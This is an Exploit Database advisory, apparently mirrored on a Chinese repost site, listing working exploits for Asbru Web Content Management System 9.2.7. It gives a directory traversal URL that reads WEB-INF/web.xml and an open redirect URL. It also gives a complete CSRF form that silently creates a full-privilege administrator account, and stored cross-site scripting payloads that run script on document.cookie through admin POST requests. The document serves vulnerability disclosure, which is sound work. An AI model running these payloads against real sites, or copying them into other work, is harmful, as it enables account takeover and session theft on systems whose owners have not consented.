Asbru Web Content Management System 9.2.7 – Multiple Vulnerabilities

• Exploit Database
• 40 阅读

• 作者： LiquidWorm
  日期： 2016-04-06
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/39667/

• 
  Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities
  
  
  Vendor: Asbru Ltd.
  Product web page: http://www.asbrusoft.com
  Affected version: 9.2.7
  
  Summary: Ready to use, full-featured, database-driven web content management
  system (CMS) with integrated community, databases, e-commerce and statistics
  modules for creating, publishing and managing rich and user-friendly Internet,
  Extranet and Intranet websites.
  
  Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site Request
  Forgery, Stored Cross-Site Scripting, Open Redirect and Information Disclosure.
  
  Tested on : Apache Tomcat/5.5.23
  Apache/2.2.3 (CentOS)
  
  
  Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2016-5314
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php
  
  
  09.03.2016
  
  --
  
  
  #1
  Directory Traversal:
  --------------------
  
  http://10.0.0.7/../../../../../WEB-INF/web.xml
  
  
  #2
  Open Redirect:
  --------------
  
  http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk
  
  
  #3
  Cross-Site Request Forgery (Add 'administrator' With Full Privileges):
  ----------------------------------------------------------------------
  
  <html>
  <body>
  <form action="http://10.0.0.7/webadmin/users/create_post.jsp?id=&redirect=" method="POST">
  <input type="hidden" name="userinfo" value="&#13;&#10;<TEST><&#47;TEST>&#13;&#10;" />
  <input type="hidden" name="title" value="Mr" />
  <input type="hidden" name="name" value="Chekmidash" />
  <input type="hidden" name="organisation" value="ZSL" />
  <input type="hidden" name="email" value="test&#64;testingus&#46;io" />
  <input type="hidden" name="gender" value="1" />
  <input type="hidden" name="birthdate" value="1984&#45;01&#45;01" />
  <input type="hidden" name="birthday" value="01" />
  <input type="hidden" name="birthmonth" value="01" />
  <input type="hidden" name="birthyear" value="1984" />
  <input type="hidden" name="notes" value="CSRFNote" />
  <input type="hidden" name="userinfo1" value="" />
  <input type="hidden" name="userinfoname" value="" />
  <input type="hidden" name="username" value="hackedusername" />
  <input type="hidden" name="password" value="password123" />
  <input type="hidden" name="userclass" value="administrator" />
  <input type="hidden" name="usergroup" value="" />
  <input type="hidden" name="usertype" value="" />
  <input type="hidden" name="usergroups" value="Account&#32;Managers" />
  <input type="hidden" name="usergroups" value="Company&#32;Bloggers" />
  <input type="hidden" name="usergroups" value="Customer" />
  <input type="hidden" name="usergroups" value="Event&#32;Managers" />
  <input type="hidden" name="usergroups" value="Financial&#32;Officers" />
  <input type="hidden" name="usergroups" value="Forum&#32;Moderator" />
  <input type="hidden" name="usergroups" value="Human&#32;Resources" />
  <input type="hidden" name="usergroups" value="Intranet&#32;Managers" />
  <input type="hidden" name="usergroups" value="Intranet&#32;Users" />
  <input type="hidden" name="usergroups" value="Newsletter" />
  <input type="hidden" name="usergroups" value="Press&#32;Officers" />
  <input type="hidden" name="usergroups" value="Product&#32;Managers" />
  <input type="hidden" name="usergroups" value="Registered&#32;Users" />
  <input type="hidden" name="usergroups" value="Shop&#32;Managers" />
  <input type="hidden" name="usergroups" value="Subscribers" />
  <input type="hidden" name="usergroups" value="Support&#32;Ticket&#32;Administrators" />
  <input type="hidden" name="usergroups" value="Support&#32;Ticket&#32;Users" />
  <input type="hidden" name="usergroups" value="User&#32;Managers" />
  <input type="hidden" name="usergroups" value="Website&#32;Administrators" />
  <input type="hidden" name="usergroups" value="Website&#32;Developers" />
  <input type="hidden" name="users&#95;group" value="" />
  <input type="hidden" name="users&#95;type" value="" />
  <input type="hidden" name="creators&#95;group" value="" />
  <input type="hidden" name="creators&#95;type" value="" />
  <input type="hidden" name="editors&#95;group" value="" />
  <input type="hidden" name="editors&#95;type" value="" />
  <input type="hidden" name="publishers&#95;group" value="" />
  <input type="hidden" name="publishers&#95;type" value="" />
  <input type="hidden" name="administrators&#95;group" value="" />
  <input type="hidden" name="administrators&#95;type" value="" />
  <input type="hidden" name="scheduled&#95;publish" value="2016&#45;03&#45;13&#32;00&#58;00" />
  <input type="hidden" name="scheduled&#95;publish&#95;email" value="" />
  <input type="hidden" name="scheduled&#95;notify" value="" />
  <input type="hidden" name="scheduled&#95;notify&#95;email" value="" />
  <input type="hidden" name="scheduled&#95;unpublish" value="" />
  <input type="hidden" name="scheduled&#95;unpublish&#95;email" value="" />
  <input type="hidden" name="invoice&#95;name" value="Icebreaker" />
  <input type="hidden" name="invoice&#95;organisation" value="Zero&#32;Science&#32;Lab" />
  <input type="hidden" name="invoice&#95;address" value="nu" />
  <input type="hidden" name="invoice&#95;postalcode" value="1300" />
  <input type="hidden" name="invoice&#95;city" value="Neverland" />
  <input type="hidden" name="invoice&#95;state" value="ND" />
  <input type="hidden" name="invoice&#95;country" value="ND" />
  <input type="hidden" name="invoice&#95;phone" value="111&#45;222&#45;3333" />
  <input type="hidden" name="invoice&#95;fax" value="" />
  <input type="hidden" name="invoice&#95;email" value="lab&#64;zeroscience&#46;tld" />
  <input type="hidden" name="invoice&#95;website" value="www&#46;zeroscience&#46;mk" />
  <input type="hidden" name="delivery&#95;name" value="" />
  <input type="hidden" name="delivery&#95;organisation" value="" />
  <input type="hidden" name="delivery&#95;address" value="" />
  <input type="hidden" name="delivery&#95;postalcode" value="" />
  <input type="hidden" name="delivery&#95;city" value="" />
  <input type="hidden" name="delivery&#95;state" value="" />
  <input type="hidden" name="delivery&#95;country" value="" />
  <input type="hidden" name="delivery&#95;phone" value="" />
  <input type="hidden" name="delivery&#95;fax" value="" />
  <input type="hidden" name="delivery&#95;email" value="" />
  <input type="hidden" name="delivery&#95;website" value="" />
  <input type="hidden" name="card&#95;type" value="VISA" />
  <input type="hidden" name="card&#95;number" value="4444333322221111" />
  <input type="hidden" name="card&#95;issuedmonth" value="01" />
  <input type="hidden" name="card&#95;issuedyear" value="2016" />
  <input type="hidden" name="card&#95;expirymonth" value="01" />
  <input type="hidden" name="card&#95;expiryyear" value="2100" />
  <input type="hidden" name="card&#95;name" value="Hacker&#32;Hackerowsky" />
  <input type="hidden" name="card&#95;cvc" value="133" />
  <input type="hidden" name="card&#95;issue" value="" />
  <input type="hidden" name="card&#95;postalcode" value="1300" />
  <input type="hidden" name="content&#95;editor" value="" />
  <input type="hidden" name="hardcore&#95;upload" value="" />
  <input type="hidden" name="hardcore&#95;format" value="" />
  <input type="hidden" name="hardcore&#95;width" value="" />
  <input type="hidden" name="hardcore&#95;height" value="" />
  <input type="hidden" name="hardcore&#95;onenter" value="" />
  <input type="hidden" name="hardcore&#95;onctrlenter" value="" />
  <input type="hidden" name="hardcore&#95;onshiftenter" value="" />
  <input type="hidden" name="hardcore&#95;onaltenter" value="" />
  <input type="hidden" name="hardcore&#95;toolbar1" value="" />
  <input type="hidden" name="hardcore&#95;toolbar2" value="" />
  <input type="hidden" name="hardcore&#95;toolbar3" value="" />
  <input type="hidden" name="hardcore&#95;toolbar4" value="" />
  <input type="hidden" name="hardcore&#95;toolbar5" value="" />
  <input type="hidden" name="hardcore&#95;formatblock" value="" />
  <input type="hidden" name="hardcore&#95;fontname" value="" />
  <input type="hidden" name="hardcore&#95;fontsize" value="" />
  <input type="hidden" name="hardcore&#95;customscript" value="" />
  <input type="hidden" name="startpage" value="" />
  <input type="hidden" name="workspace&#95;sections" value="" />
  <input type="hidden" name="index&#95;workspace" value="" />
  <input type="hidden" name="index&#95;content" value="" />
  <input type="hidden" name="index&#95;library" value="" />
  <input type="hidden" name="index&#95;product" value="" />
  <input type="hidden" name="index&#95;stock" value="" />
  <input type="hidden" name="index&#95;order" value="" />
  <input type="hidden" name="index&#95;segments" value="" />
  <input type="hidden" name="index&#95;usertests" value="" />
  <input type="hidden" name="index&#95;heatmaps" value="" />
  <input type="hidden" name="index&#95;user" value="" />
  <input type="hidden" name="index&#95;websites" value="" />
  <input type="hidden" name="menu&#95;selection" value="" />
  <input type="hidden" name="statistics&#95;reports" value="" />
  <input type="hidden" name="sales&#95;reports" value="" />
  <input type="submit" value="Initiate" />
  </form>
  </body>
  </html>
  
  
  #4
  Stored Cross-Site Scripting:
  ----------------------------
  
  a)
  
  
  POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1
  Host: 10.0.0.7
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="webeditor_stylesheet"
  
  /stylesheet.jsp?id=1,1&device=&useragent=&
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="restore"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="archive"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="publish"
  
  Save & Publish
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="scheduled_publish"
  
  2016-03-09 13:29
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="scheduled_unpublish"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="checkedout"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="revision"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="title"
  
  "><script>alert(document.cookie)</script>
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="searchable"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="menuitem"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="file"; filename="test.svg"
  Content-Type: image/svg+xml
  
  testsvgxxefailed
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="file_data"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="server_filename"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="contentdelivery"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="image1"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="image2"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="image3"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="metainfo"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="segmentation"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="author"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="description"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="keywords"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="metainfoname"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="segmentationname"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="segmentationvalue"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="contentpackage"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="contentclass"
  
  image
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="contentgroup"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="contenttype"
  
  Photos
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="version_master"
  
  0
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="version"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="device"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="usersegment"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="usertest"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="users_group"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="users_type"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="users_users"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="creators_group"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="creators_type"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="creators_users"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="editors_group"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="editors_type"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="editors_users"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="publishers_group"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="publishers_type"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="publishers_users"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="developers_group"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="developers_type"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="developers_users"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="administrators_group"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="administrators_type"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="administrators_users"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="page_top"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="page_up"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="page_previous"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="page_next"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="page_first"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="page_last"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="related"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN
  Content-Disposition: form-data; name="selectrelated"
  
  
  ------WebKitFormBoundarygqlN2AtccVFqx0YN--
  
  
  b)
  
  POST /webadmin/fileformats/create_post.jsp HTTP/1.1
  Host: 10.0.0.7
  
  filenameextension="><script>alert(document.cookie)</script>